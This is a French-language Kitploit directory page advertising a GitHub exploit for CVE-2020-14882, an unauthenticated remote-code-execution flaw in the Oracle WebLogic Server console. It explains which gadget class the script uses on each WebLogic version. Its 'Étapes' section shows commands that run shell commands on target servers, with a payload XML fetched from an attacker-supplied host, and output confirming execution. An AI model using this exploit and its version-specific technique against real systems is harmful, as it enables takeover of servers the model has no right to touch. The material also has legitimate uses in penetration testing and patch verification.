Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2020-14882 — CVE-2020-14882 | Kitploit
Outils/GitHubGitHub/milo2012/cve-2020-14882
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleDéveloppement de Charges Utiles
GitHubmilo2012/cve-2020-14882

CVE-2020-14882

CVE-2020-14882

Voir le dépôt
89il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2020-14882

CVE-2020-14882

Description

Vulnérabilité dans le produit Oracle WebLogic Server d'Oracle Fusion Middleware (composant : Console). Les versions prises en charge qui sont affectées sont 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 et 14.1.1.0.0. Une vulnérabilité facilement exploitable permet à un attaquant non authentifié disposant d'un accès réseau via HTTP de compromettre Oracle WebLogic Server. Des attaques réussies de cette vulnérabilité peuvent entraîner la prise de contrôle d'Oracle WebLogic

Différence

Pour les versions d'Oracle WebLogic antérieures à 12.2.1, il faut utiliser la classe 'com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext' car la classe 'com.tangosol.coherence.mvel2.sh.ShellSession' n'est pas disponible. Le script alterne automatiquement entre les deux classes pour l'exécution de commandes en fonction des versions détectées.

Certains des scripts actuels disponibles sur Github pour exploiter CVE-2020-14882 ne prennent en charge que la classe 'com.tangosol.coherence.mvel2.sh.ShellSession', ce qui signifie que les scripts échoueront sur les versions WebLogic 10.3.6.0.0 et 12.1.3.0.0.

Étapes

root@kitploit:~
% python3 CVE-2020-14882.py -u http://172.16.164.134:7001 -c 'uname -r > /tmp/success' -i 172.16.164.1
[*] http://172.16.164.134:7001/console/login/LoginForm.jsp [version 12.1.3.0.0]
[*] Using: com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext
172.16.164.134 - - [25/Feb/2021 20:55:36] "GET /test.xml); HTTP/1.1" 200 -
172.16.164.134 - - [25/Feb/2021 20:55:36] "GET /test.xml); HTTP/1.1" 200 -
172.16.164.134 - - [25/Feb/2021 20:55:36] "GET /test.xml); HTTP/1.1" 200 -
root@kitploit:~
% python3 CVE-2020-14882.py -u http://127.0.0.1:7001 -c 'uname -r' -i 172.16.164.1
http://127.0.0.1:7001/console/login/LoginForm.jsp
[*] http://127.0.0.1:7001/console/login/LoginForm.jsp [version 12.2.1.3.0]
[*] Using: com.tangosol.coherence.mvel2.sh.ShellSession
Linux 96fc5d43736b 4.19.121-linuxkit #1 SMP Tue Dec 1 17:50:32 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
Télécharger l’outil